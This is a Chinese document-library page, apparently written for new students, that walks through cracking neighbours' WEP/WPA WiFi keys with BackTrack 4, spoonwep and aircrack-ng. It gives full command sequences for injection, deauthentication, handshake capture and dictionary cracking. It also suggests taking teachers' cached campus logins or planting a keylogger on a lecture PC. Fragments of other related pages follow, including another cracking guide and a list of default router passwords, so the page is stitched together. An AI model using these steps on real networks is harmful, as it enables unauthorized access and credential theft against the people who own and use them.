文档库 最新最全的文档下载
当前位置:文档库 › WIFI破解全过程BT4

WIFI破解全过程BT4

WIFI破解全过程BT4
WIFI破解全过程BT4

PS:本篇文章主要写给大一新生,且与还没来得及去买上网号的童鞋们。更主要是自己破解省了网费的支出了。其

实这样做完全没必要,每个老师都有学校给的太极上网号,在老师下课

去厕所到时候,可以到讲桌电脑里考个CIAN把缓存到IE里的账号查出来

,诸如:

或者直接放键盘记录器,方法很多,不废话了。之前说了要先发破解

无极的AP教程,但是因为一些变故没法发了,见谅,但是我可以提示一

点,大家知道的可以自己去试试:当连接上无极的路由时候滞留于网关

上的复写加密动态密钥其实已经保存到太极登陆软件的缓冲区了,用OD

破之!非常简单。(只不过太极每次连接的时候都生成的不一样的串码)

=====================================

学校里有很多的无线路由器,但基本都WEP/WPA1/2的加密过了,想要连

接上去只有知道AP的128或64位密钥才行,看看我宿舍所在的地方有多少无线路由连接

但是在大部分测试的WEP加密

方式中,基本快则5分钟,慢则半小时就可破解掉了其连接密钥,只要

对方不在路由选项里过滤你的MAC,你可以随时的蹭网用。如图:

现在网上流传的WEP/WPA工具很多,也很杂,当本人全部大概用过后还是觉得BT+SPOONWEP/WPA比较傻瓜化,效率也奇高,其他的软件就不多鳌述了。

环境:XP

显卡:wifi inter link 5100 agn

驱动:最新

软件:BT3或BT4 BATE或BT4 PRI(因为本人的显卡是最新版的,所以前两种LINUX下未集成本网卡驱动,所以不支持诸如嗅探,扫描与注入的操作,推荐大家去下载前两种)

破解软件:spoonwep2和spoonwpa

==========================================

我们这里先用BT4+spoonwep2来做一下示范吧,其他的原理都是相同的

一:启动BT4

首先下载好BT4和spoonwep2

将两者解压,再把解压出来的spoonwep2.lzm放到BT4\\modules目录中如果你是下载的光盘版就直接刻录成光碟,然后重启电脑的时候选择光盘启动项目,如果你是下载的USB版就直接保存到USB上,启用USB启动,VM版的BT4可能对集成的无线网卡支

持不太好,USB无线网卡则支持得很好,启动方法很多,但是都很麻烦

,我这里讲一种硬盘启动方法:

BT4(bt4-pre-final版)是基于ubuntu的linux,采用grub方式引导。

一、准备工作:

1、下载grub4dos软件最新版;

2、下载bt4-pre-final.iso,把bt4-pre-final.iso中的boot、casper 文件夹复制出来放到E盘根目录下。

二、步骤:

1、把grub4dos压缩包解压缩,将grldr、grub.exe、menu.lst三个文件拷入C盘根目录;

2、编辑C盘下的boot.ini,在boot.ini的最后加上一行:

c:\\grldr="Load GRUB4DOS"。如果boot.ini中的timeout值为零,把它设置为大于0的数字,例如timeout=3,然后保存boot.ini。

3、编辑C盘下的menu.lst

color black/cyan yellow/cyan

timeout 30

default /default

fallback 1

splashimage (hd0,5)/boot/grub/bt4.xpm.gz

title Boot BackTrack 4

kernel (hd0,5)/boot/vmlinuz BOOT=casper boot=casper nopersistentrw quiet vga=0x317

initrd (hd0,5)/boot/initrd.gz

title Start Windows

rootnoverify (hd0,0)

makeactive

chainloader +1

title Shutdown the Computer

halt

title Reboot the Computer

reboot

可以将原menu.lst里面的内容都删除,写入上述内容,需注意格式。

关键的一点是:kernel (hd0,5)/boot/vmlinuz BOOT=casper

boot=caspernopersistentrw quiet vga=0x317 此行参考bt4里面

的menu.lst,只是添加了(hd0,5),如果bt4放在C盘启动则不需要添加

(hd0,5)的计算是hd0为第一块主硬盘,在grub下逻辑分区从4开始,所以D盘即为4,E盘即为5。

重启选择Load GRUB4DOS,再选Boot BackTrack 4,即可启动BT4。

此方法bt4将E盘当作cd读取,系统启动后不能识别硬盘其他分区,所在的E盘可读不可写,不知甚原因。

====我自己修改了个汉化集成软件版本,实在没法启动的童鞋找我要吧

====

二:破解密码(GUI版)

通过以上的几种方法皆可启动下载的BT4,如图:

之后就需要输入“startx”进入系统了,如图:

然后进入系统的时候就开

始破解了,现在就要去找spoonwep2了,左下角开始的旁边有个黑色的框框,也就是SHELL,点击,输入:spoonwep就可以显示spoonwep2的界

面了。如图:

在各项选项里选择以下操作

NET CARD 网卡接口选择 WIFI0

DRIVER 驱动选择 NORMAL

MODE 模式选择 UNKNOWN VICTIM

然后点击下面的NEXT,接着就会转入VICTMS DISCOVERY界面。

好了,可以看见VICTMS DISCOVERY界面左面的选项是默认的CHAN HOPPING 这个事无线的AP的工作频道,不要动,直接点击右侧的LAUNCH 按钮。

这时会弹出抓包窗口(SCAN),可作为参考,也可不用理会。稍等一会儿,如果能够找到符合要求的信号,会在当前的victims discovery 窗口中显示扫描到的信息,其中:

ESSID 路由广播名称

MAC 路由的MAC地址

CHAN 使用的频道

POW 信号强度

DATA (注意:这个数值一直为0基本无法破解,你可另寻时机等到有DATA再破)

CLIS 空白代表无客户端,打钩则代表有客户端

每一行代表一个扫描到的无限AP信号,点击选中你要破解的信号(尽量选择有DATA以及CLIS后有对号的信号进行破解);然后在信号信息框的下面相应的显示出在AP当前的客户端,你可以点击选中一个客户端(这样更容易破解一些),也可以不选。然后点击窗口下边的selection OK按钮,就会进入attack panel界面。

在attack panel界面,攻击模式下拉框中几个选项的区别如下(由客户端建议选择第一项,无客户端建议选择第四项):

ARP REPLAY ATTACK (有客户端时用,3ARP注入)

P0841 REPLAY ATTACK (第三选择,2交互注入)

CHOPCHOP & FORGEATTACK (第二选择,4断续注入)

FRAGMENTATION & FORGE ATTACK(首选,5碎片注入)

然后直接点击launch即可是破解,这时同样会在任务栏出现一个新的

窗口,你可以用鼠标点击出来看一看,里面会显示一些相关的信息,如

信号强度等。大家注意上面图片里有个‘24858 IVS’,其中IVS就是我们要寻找的带有特殊数据包的IVS格式包,我说的抓包其实就是抓的这个IVS包。基本学校里的密钥抓到大概10000IVS就差不多出密码了,如果到了4W还没显示密码的话,我还是劝告童鞋去换个目标吧,这段抓包的时间就去喝喝茶,去看看书吧。因为我们是被动抓的包,所以必须跳个好点,流量大的时间段去破解,因为那时候对方在下迅雷的时候,会飞快的产生IVS包,所以我建议大家在12点半到1点半,晚上九点半到11点半,这两段时间内选择破解,因为是上网的高峰。注意,最后破解出来的密码是在attack panel界面下方显

示(而不是在spoonwep dump窗口显示)。

密码就是:52 15 21 13 14.

然后,重启进入XP系统,选择无线连接里的你刚才破解的那个AP,填上密钥,就能享受免费带来的上网乐趣了。

============================================================

以上是最最最最简便的傻瓜方法,一般都是那样破解的方便也省事儿,但是有的时候,目标AP不会产生大量的IVS包,会对于我们抓包产生非常大的影响,因为本身没有太多的流量

产生,我们在通过WIFI的TCP握手的时候产生的有效IVS也会少的可怜,这样对于必须要抓至少10000IVS来说,简直是浪费时间,所以,这时候我们就要化被动为主动的注入,使其多产生相互之间的更多数据交汇,这样针对没有客户的AP或者在空闲的AP来说是非常有效地。

三:手动注入(SHELL代码注入,新手跳过)

以下主要针对SHELL的代码输入操作,其实SPOONWEP就看做一个界面型的代码整合软件,现在我们要脱离它的帮助,自己去手动注入。

还是拿我的5100网卡做演示(其他的网卡方法大体一致,网上搜更多的资料看看吧)

shell 1:----------------------------------------

1.ifconfig -a

[

macchanger -m 00:11:22:33:44:55 wlan0

<修改自己网卡的MAC 地址。当对方设置了MAC 地址过滤时或为了方便后面输入>

]

2.ifconfig -a wlan0 up

(5100可能要加载网卡才支持注入?)

3.airmon-ng start wlan0 6

(6是频道)

另一说5100要支持注入用airmon-ng start wlan0

如果这里回显<(monitor mode enabled)> 则下面命令所有端口号要用"wlan0"

[

aireplay-ng -9 mon0 / aireplay-ng --test mon0

(注入攻击成功/不成功)

(检测你的网卡是否支持注入)

]

4.airodump-ng -w pack -c 6 mon0/wlan0

(pack是随便起的获取的ivs的保存文件的名字)

另一说用airodump-ng --ivs -w pack -c 6 mon0/wlan0

shell 2:----------------------------------------

一、有客户端:

破解:abcd四种方式

a.合法客户端产生大量有效的数据,能直接获得大量cap。

收到10000以上data后,直接转shell 3,破解密码

b.合法客户端只能产生少量数据,就需要注入<-3>攻击加速产生大量数据。

5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac)

mon0/wlan0(wlan0测试不行)

,send 71524 packets ... 很多类似行>

c.合法客户端不在通信,注入模式不成功,

用-0 冲突模式强制断开合法客户端和ap连接,使之重新连接,

新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入

5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) wlan0

6.aireplay-ng -0 10 -a 000000000000(APmac) -c 111111111111(合法客户端mac) wlan0 (可能要另开窗)

d.有客户端,并且客户端能产生有效arp 数据的另类破解方式

输入modprobe –r iwl3945

(加载网卡)

输入modprobeipwraw

输入airmon-ng start wlan0 6

现在,只要一个命令就搞定,输入:

输入wesside-ng -i wlan0 -v 01:02:03:04:05:06<此格式的APmac>。

二、无客户端:

5.aireplay-ng -1 0 -a 000000000000(APmac) -h 111111111111(Mymac) mon0

(我成功了)

另一说用aireplay-ng -1 0 -e Kingnet -a (APmac) -h (Mymac) mon0/wlan0

(建立虚拟伪装连接)

如果失败可尝试降低网卡速率后再试:iwconfig mon0 rate 2M(注意大写)

破解:abcd四种方式

a.-2 crack mode ---------------

建立虚拟连接后直接用-2交互攻击模式集合了抓包,提数据和发包攻击

6.aireplay-ng -2 -p 0841 -c ffffffffffff -b (ap mac) -h (my mac) wlan0

发包成功后可得到足够的ivs,然后用aircrack-ng破解

b.-3 crack mode ---------------

6.aireplay-ng -3 -b (AP mac) -h (MY mac) mon0

7.用aircrack-ng破解<自己添加的步骤?>

c.-4 crack mode ---------------

-4攻击模式;制造数据包;-2交互式攻击模式

6.aireplay-ng -4 -b (APmac) -h (Mymac) mon0

7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 –l 255.255.255.255 -y replay-xxx.xor -w myarp

(提取上面xor 文件来伪造一个arp包)

8.aireplay-ng -2 -r myarp mon0

一说用aireplay-ng -2 -r myarp -x 512 mon0

(发现了可利用的myarp的数据包,按y后,立刻注入攻击。Date疯涨)

9.用aircrack-ng破解

d.-5 crack mode ---------------

-5碎片攻击模式;制造数据包;-2交互式攻击模式

(我成功过)

6.aireplay-ng -5 -b (ap mac) -h (my mac) mon0

(利用-5 碎片攻击模式获得一个可用的包含密钥是数据文件(xor 文件))

7.packetforge-ng -0 -a (APmac) -h (Mymac) -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxx.xor -w myarp

(Myarp随便起的文件名)

8.aireplay-ng -2 -r myarp -x 256/512 mon0

(这时,前面的抓包窗口上的data 将迅速增加)

(512是攻击速度,1024是最大值)

9.采用aircrack-ng 来进行破解

shell 3:----------------------------------------

aircrack-ng *.cap

如果shell 1用了--ivs 参数,则这里用aircrack-ng *.ivs

(我成功了)

另一说用aircrack-ng -n 64 -b APmac pack-01.cap

>

附:

5100用BT4+spoonwep2破解

1.把spoonwep2放在BT4\\modules\\下,启动BT4

2.

ln -fs bash /bin/sh

ls -al /bin/sh

<显示bash为成功,dash为失败>

3.开spoonwep2,里面可以找到网卡了,选wlan0进入搜索,但这时不会搜出来什么,

关闭一下spoonwep2再重启spoonwep2,

这时网卡项里有一个mon0的,选mon0,driver选normal,mode选unknow victim,选定PO841 replay attack,点击launch后就等待密

码的出来(sata数据包到30000个左右)。

(注:论坛中的高手说spoonwep2支持5100AGN网卡注入式破解)

---------------------end---------------------

---------------------WPA---------------------

1.ifconfig -a

2.ifconfig -a wlan0 up

3.airmon-ng start wlan0 6

(6是频道)

4.airodump-ng -w 12345 -c 6 mon0/wlan0

(保存名为12345.cap)

(-w:写入文件,-c:截取cap的频道)

5.aireplay-ng -0 10 -a (ap mac) mon0/wlan0

或者输入:aireplay-ng -0 10 -a (ap mac) -c (合法客户端mac) mon0/wlan0(wlan0可能

不对)

<18:56:20 Sending 64 directed DeAuth,... 一些类似行>

(-c后面为合法无线客户端的MAC地址)

(迫使AP重新与已连接的合法客户端重新握手验证)

(攻击几次后可以做破解尝试。WPA破解不用等到数据Data 达到几万,因为它只要一个包含WPA握手验证包就可以了)

Cap数据包破解:

a.暴力破解

6.aircrack-ng -x -f 2 12345*.cap

另一说是用aircrack-ng -z -b (ap mac) 12345*.cap

b.字典破解

6.aircrack-ng -w password.txt 12345*.cap

另一说是用aircrack-ng -w password.txt -b (ap mac) 12345*.cap

(

-w:是字典破解模式

Password.txt是你事先准备好的字典。

技巧:可以在windows 下使用下载的字典工具生产字典,再在BackTrack3 下拷贝到/root 下(aircrack 默认

的工作目录在/root)。

请注意,破解WPA 密码的时间取决于密码难易程度,字典包含程度,内存及CPU 等。多则数小时。

)

c.把CAP数据包拷贝出来在WIN下用WinAircrack 破解

启动WinAircrack,General-)Encryption type-)wpa-psk,Capturefiles-)12345-01.cap Wpa-)Dictionary file-)pswd.txt,点右下角Aircrack the key...

d.HASH破解

6.genpmk -f dictionary.txt -d D-LINK.hash -s D-LINK (注意大小写)

(Windows版本操作步骤与其Linux下版本完全一致)

(

参数解释:

-f 这里跟上采用的字典

-d 生成的Table文件名称

-s 目标AP的ESSID

)

7.cowpatty -d D-LINK.hash -r *.cap -s D-LINK

(

参数解释:

-d 导入WPA PMK Hash Table文件名称,下图中为dlink-birth.hash

-r 事先捕获的WPA握手数据包

-s 目标AP的ESSID

)

---------------------end---------------------

WPA破解,怎么知道有握手包被截获?

airodump-ng监视窗右上角有提示:

...... WPA handshake: 00:90:4c:8e:00:65

BT4抓包后,cap文件保存在哪?

输入ls可以看到啊,默认在root下。

如何获得合法端mac?

windows下可以使用OmniPeek、Wireshark、Ethereal、Aircrack-ng for Windows等工具实现对客户端MAC的拦截,Linux可用

Kismet、Aircrack-ng中的airodump-ng等来实现。需要注意的是,若目标网络采用WEP或者WPA加密的话,有时需先行破解再对数据

包解密方可看到客户端MAC。

前面第一个shell,如下若有station显示,bb:bb:bb:bb:bb:bb就是合法客户端mac BSSID STATION ...

aa:aa:aa:aa:aa:aabb:bb:bb:bb:bb:bb

如何查找隐藏的SSID?

1.在BT4下先打开一个shell,输入

airodump-ng 网卡端口

2.打开另一个shell,输入

aireplay-ng -0 10 -a AP'MAC -c 合法客户端'MAC 网卡端口

可能这个命令由于频道不对会出错,这时就要多重输几次(如果不行,就是不是合法客户端,要再试其它的客户端),直到提示成功为止

3.然后就可以在上个shell,看到显示出来的SSID。

最后简单的概括就是以下的八部操作:

1) ifconfig -a

2) airmon-ng start wifi0 6

3) airodump-ng --ivs -w name -c 6 ath1

4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1

-1 is -one

5) aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1

新的第5步: aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 ath1

6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l 255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp

7) aireplay-ng -2 -r mrarp -x 1024 ath1

8) aircrack-ng -n 64 -b ap_mac name-01.ivs

最后截图就是这样的

=================================================================

以上大概就是注入的全部过程了,大家看着眼花,我自己写的也糊里糊涂,有的还是从网上摘得文献

在这里就说到这里了,有兴趣的童鞋疑问的地方就在下面留言吧,坚持努力的多看看,多试试,破解无线路由的连接密钥其实非常简单,在这里,我推荐一个非常好的无线破解论坛;https://www.wendangku.net/doc/d45199927.html,/bbs/

要是想多了解关于无线文献的话,推荐去图书楼四楼的阅览室2最东头倒数三四排,里面全是无线技术的文章文献。。

破解无线wifi图文教程

破解无线wifi图文教程 嘿,有搜到身边的无线WIFI吗?想没用又没密码,我要教你怎么“借”用一下!哈! 准备好工具: 1.电脑一台. 2.无线接收器一个; 3.VM虚拟机(软件); 4.cdlinux系统镜像(软件)这两种百度一下就可以了!(注意,破解的是WPA WAP2加密的信号!不是100%破解,看人品) 在WINDOWS平台下安装VM虚拟机(虚拟机主要是方便与WIN切换). 由于VM虚拟机安装都是步骤傻瓜式安装,这里不截图了,但安装过程中有些版本会跳出安装插件这类,比如USB识别一定要安上,不然虚拟机会认不到无线网卡,我用这个版本就有这个,如图一般选一键全部安装再,再安装上USB设备项,内置无线网卡没用过,应该不用USB这一项… 虚拟机安装好之后,运行如下图,不同的版本界面会有些变化,但虚拟机版本只是 个托,我们要的是破解结果..

1.1 这时就需要虚拟一个破解系统就是CDlinuX.破解过程将在这个系统里面进行! 1.2 点击新建虚拟机-(如下步骤图)

通常架设设置到启动到虚拟系统界面一般20秒左右!

好了!现在是破解正题了!通常是以两种破解方式,分别是跑包法跟PIN法 1.跑包法只能在客户端在线的时候才可以(即上图的在线客户端),而且通常只能跑简单密码,比如123456798.生日,电话之类(这个也要基本你的密码本,一般CDLINUX里面有附带密码字典,可以网下载生成包,生成的容量大得吓人,因为以8位开始,可以由数字,字母,符号随机复数生成,我试过只点一部分参数,生成大概好几十亿的数据量,容量就高达8000G)别说时间,单是容量我就坑住了...跑包这人挂了说不定还没跑完!下面为例图! 选中有线的客户端后,点启动,会有后台在扫描对方面的握手包(握手包不一定会得到,取决于对方在用这个无线信号时产生的数据量而定,时间长短不一,有时十多秒就可以得到,有时跑几小时也是失败的!) 握手包得到后,会自动弹出用字典跑密码,YES。 选择YES之后会弹出自带的字典目录,一般以TXT为文件,确定!

卡王(安装,使用,购买)教程全解

怎样才能不被蹭? 这被人蹭的感觉真不好,那么怎样才能不让人蹭呢?我想还是先来看看如何蹭别人,这样才能从根本上了解这其中的一切奥秘。 关于“奶瓶”的介绍

既然说到蹭网,首先让我们来看看我们需要准备什么东西。首先是一个电脑一台路由器一个这类的废话我们就不多说了,现在我们需要的是一个U盘,别小于128MB就行。 将其格式化 先把它格式化了,需要注意的是,一定要选择FAT格式,这点一定要记住,否则下面就没办法继续进行了。格式化完成之后,下面就让我们向着周围的路由器们发起进攻吧。

绰号“奶瓶”的Linux系统 奶瓶这个系统,相信玩无线的朋友应该都会知道。这是一款基于Tiny Core Linux搭建的无线网络安全测试系统,当然由于它是用来安全测试的系统,因此在安全方面自然有着强大的功能。而且,这个系统非常简便易学,因此现在已经逐渐的取代BT3、BT4之类的工具,而逐渐成为了无线网络安全研究的主流系统。今天,我们就要应用这个系统来完成后面的事情。 制作“奶瓶”启动U盘 相比于其它的系统,“奶瓶”最大的优点除了操作简便易懂之外,还有一个优点就是制作U盘启动盘非常容易,而且成功率较高。

UltraISO软件界面 下载好的“奶瓶”系统是一个.iso文件,而大小只有40MB左右,因此我们可以轻易的使用镜像软件将其写入U盘。这里,我们使用了UltraISO这款软件,相比其它的同类型软件,这款显得要简便易懂很多。 导入镜像文件之后,选择写入方式

写入速度很快,一分钟不到 加载引导文件 但是有时候选择直接写入之后,电脑并不能成功从U盘启动“奶瓶”。因此如果制作不成功之后,我们还需要选择手工加载引导文件。

使用Aircrackng破解WPAPSK加密无线网络

使用Aircrack-ng破解WPA-PSK加密无线网络 结合上小节的内容,下面继续是以BackTrack4 R2 Linux为环境,讲述破解WPA-PSK加密无线网络的具体步骤,详细如下。 步骤1:升级Aircrack-ng。 前面在第一章1.3节我们已经讲述了升级Aircrack-ng套装的详细步骤,这里也是一样,若条件允许,应将Aircrack-ng升级到最新的Aircrack-ng 1.1版。由于前面我已经给出了详细的步骤,这里就不再重复。 除此之外,为了更好地识别出无线网络设备及环境,最好对airodump-ng的OUI库进行升级,先进入到Aircrack-ng的安装目录下,然后输入命令如下: airodump-ng-oui-update 回车后,就能看到如下图23所示的开始下载的提示,稍等一会儿,这个时间会比较长,恩,建议预先升级,不要临阵磨枪。 图23 步骤2:载入并激活无线网卡至monitor即监听模式。 在进入BackTrack4 R2系统后,载入无线网卡的顺序及命令部分,依次输入下述命令: startx 进入到图形界面 ifconfig –a 查看无线网卡状态 ifconfig wlan0 up 载入无线网卡驱动 airmon-ng start wlan0 激活网卡到monitor模式 如下图24所示,我们可以看到无线网卡的芯片及驱动类型,在Chipset芯片类型上标明是 Ralink 2573芯片,默认驱动为rt73usb,显示为“monitor mode enabled on mon0”,即已启动监听模式,监听模式下适配器名称变更为mon0。

bt3 bt4 bt5 使用教程大全

软件介绍 本套资源由99d软件站购买,免费提供给网友们下载。99d软件站搜集提供,安全无毒,快捷免费无广告的软件站,请大家多多支持,推荐给你的亲朋好友们! 99d软件站友情提示:作为bt5启动盘,刻盘只需要将CDlinux.iso刻盘就可以了,其他部分可以放在硬盘上看就可以了。上次不小心打包重复了部分文件,造成100m体积的浪费,现在重新打包上传。 至于有朋友问:“里面的PDF要密码密码是多少” 99d测试了全部pdf,没看到任何一个要密码的。如果 你发现要,请说明具体的文件 关键词:bt5 bt5软件 bt5下载 bt5软件下载 bt5教程 bt5破解 bt5破解版 bt5破解版下载 bt5破解教程 bt5光盘 bt5 iso bt5教程 bt5一键中文破解 bt5蹭网卡 bt5破解无线网 bt4 bt4软件 bt4下载 bt4软件下载 bt4教程 bt4破解 bt4破解版 bt4破解版下载 bt4破解教程 bt4光盘 bt4 iso bt4教程 bt4一键中文破解 bt4蹭网卡 bt4破解无线网 BT5(BT4)全称Back Track four,这是一个linux环境的便携系统,可以放到U盘或者盘中启动,对本 身硬盘没有影响,无需在本地安装。

是圈内非常著名的黑客攻击平台,是一个封装好的Linux操作系统,内置大量的网络安全检测工具以及黑 客破解软件等。 BT3~4因可以方便的破解无线网络而出名,其中内置的spoonwep是一个非常悍的图形化破解wep无线网络 密的工具。 BT5(BT4)被广泛用于配合卡皇、卡王、雷凌3070、阿凡达G2000、蓝盾8G/G20、魔影5000G、幻影G3000、风影30G、雷影9000G、无线王5000G、风火轮6000G等等大功率蹭网卡用于破解无线路由密码,达到蹭网目的。而bt5更是出色,步骤更加简化,号称一键破解。 本linux系统光盘介绍: 1、可以光驱、Win下VMware虚拟机启动也可以安装到U盘或者硬盘启动 2、破解工具里面集成了1940年到2012年所有8位数的生日密码,加入0-9,英文26个字母重复形式的 8-10位数密码,另外加入部分常用密码 3、本linux系统和破解工具全部为中文绝无文字障碍,配合我的视频教程包教会破解。 破解说明: 新手只要设置电脑光驱启动,用BT5光盘启动LINUX系统或者使用视频教材用VMware虚拟机启动linux后进行全中文一键破解WEP,WPA方式密码按光盘里目录下的教材进行学习。 1、WEP加密方式分为开放式和共享式: 开放式的加密方式一般可以顺利的注入并破解成功 共享式的加密方式必须要有客户端才能破接。但可以在XP下用别的无线网卡连接要破的AP(多连几次), 有时候可以收到意想不到的效果! 2、WPA的破解属于暴力破解并且必须要客户端 3、要想破接顺利最好用USB线把卡放到窗户边再外接个高增益的天线来提高信号 4、ChinaNet、CTC开头的信号还有AR7WRD和HG520s都是电信送的,没有路由功能的无线猫,是用电脑来拨号的,AP本身只是打开了与电信的桥接功能,并没有在AP内设拨号,也没有打开路由功能,所以你只 能联到AP,除非你也有宽带帐号,不然还是不能上网! 本套资源由99d软件站购买,免费提供给网友们下载。99d软件站搜集提供,安全无毒,快捷免费无广告 的软件站,请大家多多支持,推荐给你的亲朋好友们!

教你破解WAP2无线路由器SSID密码

关于“奶瓶”的介绍。。https://www.wendangku.net/doc/d45199927.html,/bbs/index.php 既然说到蹭网,首先让我们来看看我们需要准备什么东西。首先是一个电脑一台路由器一个这类的废话我们就不多说了,现在我们需要的是一个U盘,别小于128MB就行。 将其格式化 先把它格式化了,需要注意的是,一定要选择FAT格式,这点一定要记住,否则下面就没办法继续进行了。格式化完成之后,下面就让我们向着周围的路由器们发起进攻吧。 绰号“奶瓶”的Linux系统 奶瓶这个系统,相信玩无线的朋友应该都会知道。这是一款基于 Tiny Core Linux 搭建的无线网络安全测试系统,当然由于它是用来安全测试的系统,因此在安全方面自然有着强大的功能。而且,这个系统非常简便易学,因此现在已经逐渐的取代BT3、BT4之类的工具,而逐渐成为了无线网络安全研究的主流系统。今天,我们就要应用这个系统来完成后面的事情。 制作“奶瓶”启动U盘

相比于其它的系统,“奶瓶”最大的优点除了操作简便易懂之外,还有一个优点就是制作U盘启动盘非常容易,而且成功率较高。 UltraISO软件界面 下载好的“奶瓶”系统是一个.iso文件,而大小只有40MB左右,因此我们可以轻易的使用镜像软件将其写入U盘。这里,我们使用了UltraISO这款软件,相比其它的同类型软件,这款显得要简便易懂很多。

导入镜像文件之后,选择写入方式 写入速度很快,一分钟不到 加载引导文件 但是有时候选择直接写入之后,电脑并不能成功从U盘启动“奶瓶”。因此如果制作不成功之后,我们还需要选择手工加载引导文件。

引导文件位置 我们首先需要将下载的“奶瓶”的.iso文件解压缩,然后在如上图所示的目录中找到引导文件,然后再进行加载,如此操作之后,再进行U盘的写入。 进入“奶瓶”系统 修改BIOS设置

BT4破解无线WiFi密码最简单的方法

用BackTrack4 破解WEP加密教程 一、需要工具 1、BT4系统,我用的是这个(已集成破解工具): 下载地址(网盘) : dl/6/d4d28eb/BT4(). dl/4/38cd6a9/BT4(). dl/1/939edf9/BT4().电驴下载:ed2,只要无线网卡兼容BT3)。 二、启动BT4系统 方法一、光盘启动,将下载的ISO刻盘,把BT4光盘放入光驱,重启电脑。方法二、安装到硬盘,从硬盘启动。安装方法(安装到XP):============================================================ 1. 在D盘新建一个BT4的目录,把下载到里面.并修改名字为 请注意:BT4是大写的.文件夹区分大小写 2. 把解压到BT4目录里。 4. 把解压到C盘。 5. 并在启动菜单里加入: c:\grldr="无线网卡破解 BT4 BackTrack 4 Pre Release" ============================================================ 重启电脑后,进入这个介面:

直接按回车进入BT4 ,过会儿提示你输入用户名(root)和密码(toor)。 这个时候输入startx回车进入BT4。

已经进入BT4了。三、启动破解软件

1. 单击桌面spoonwep,弹出“spoonwep settings”设置框: NET CARD:表示选择网卡,卡王选择W LAN0;(我的USB网卡选择RAUSB0)DRIVER:表示选择驱动,卡王选择N ORMAL; MOD:表示是否有目标,一般选择U NKNOWN VICTIM, 2. 点“NEXT”,进入“VICTIMS DISCOVERY”标签:

WIFI密码如何破解 教你百分之百成功蹭网

WIFI密码如何破解?最无奈的事情莫过于有WiFi却不知道WiFi密码,下面给大家介绍几个方法,教你百分之百成功蹭网。 手机上面破解wifi蹭网 教你百分之百成功蹭网方法一:默认密码大猜想 以下为常见路由器默认密码(一些新手新买的路由器一般嫌麻烦都不会修改密码哦) 品牌:ViKing用户名:adsl 密码:adsl1234 品牌:实达默认IP:192.168.10.1版本: 用户名:admin 密码:conexant 版本:2110ehr v4.5用户名:root 密码:grouter 用户名:admin 密码:starnetadsl 品牌:艾玛默认IP:192.168.101.1用户名:admin 密码:admin WIFI密码如何破解教你百分之百成功蹭网(图片来源:摄图网) 品牌:神州数码/华硕用户名:adsl 密码:adsl1234 品牌:全向用户名:root 密码:root 品牌:普天用户名:putian 密码:123456

品牌:e-tek用户名:admin 密码:12345 品牌:zyxel用户名:anonymous密码:1234 品牌:北电用户名:anonymous 密码:1234 5品牌:大恒用户名:admin 密码:admi n品牌:大唐用户名:admin 密码:1234 品牌:斯威特用户名:root 密码:root 用户名:user 密码:user 品牌:中兴用户名:adsl 密码:adsl831 品牌:BENQ用户名:user 密码:benq1234 品牌:华硕用户名:ADSL 密码:adsl1234 腾达192.168.0.1 admin / admin 用户名:admin 密码:admin 教你百分之百成功蹭网方法二:推荐使用“wifi万能钥匙” 当然,wifi万能钥匙并不是万能的,其原理而是将已知得免费公共wifi热点的资源集中在一起,如果当你所在的地方搜索到wifi万能钥匙数据库的wifi后便自动连接。它并不能让你进入别人加密的wifi。如果以前进入过某个wifi,现在又无法进入,那么可能是以前wifi 的所有者并没有加密,现在加密了,或者密码被修改了!#p#副标题#e# 电脑上面破解wifi蹭网 比起电脑上面相对简单多了,当然手机的方法也绝对适用于电脑上面!同时,很有必要我告诉大家一些新的方法高科技黑客方法!(核心方法) 方法:BackTrack3(BT3破解) 准备工作 1、一个有可破解无线信号的环境。如我在家随便搜索出来的信号。 2、带无线网卡的电脑一台(笔记本台式机均可,只要无线网卡兼容BT3),我用的是三星NC10的上网本。

airmon-ng破解wifi教程

root@kali:~# airmon-ng#有出现以下提示说明此无线网卡支持 PHY Interface Driver Chipset phy0 wlan0rtl8192ce Realtek Semiconductor Co., Ltd. RTL8188CE 802.11b/g/n WiFi Adapter (rev 01) root@kali:~# airmon-ng start wlan0#启动网卡 Found 3 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to run 'airmon-ng check kill' PID Name 533 NetworkManager 661 wpa_supplicant 711 dhclient PHY Interface Driver Chipset phy0 wlan0 rtl8192ce Realtek Semiconductor Co., Ltd. RTL8188CE 802.11b/g/n WiFi Adapter (rev 01) (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0)

root@kali:~# airodump-ng wlan0mon#开始进行监听 CH 3 ][ Elapsed: 54 s ][ 2017-02-21 21:29 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID C4:**:**:**:**:AC -36 100 10 0 8 54e. WPA2 CCMP PSK gp 8C:**:**:**:**:3C -42 114 1 0 12 54e WPA2 CCMP PSK

bt4使用方法

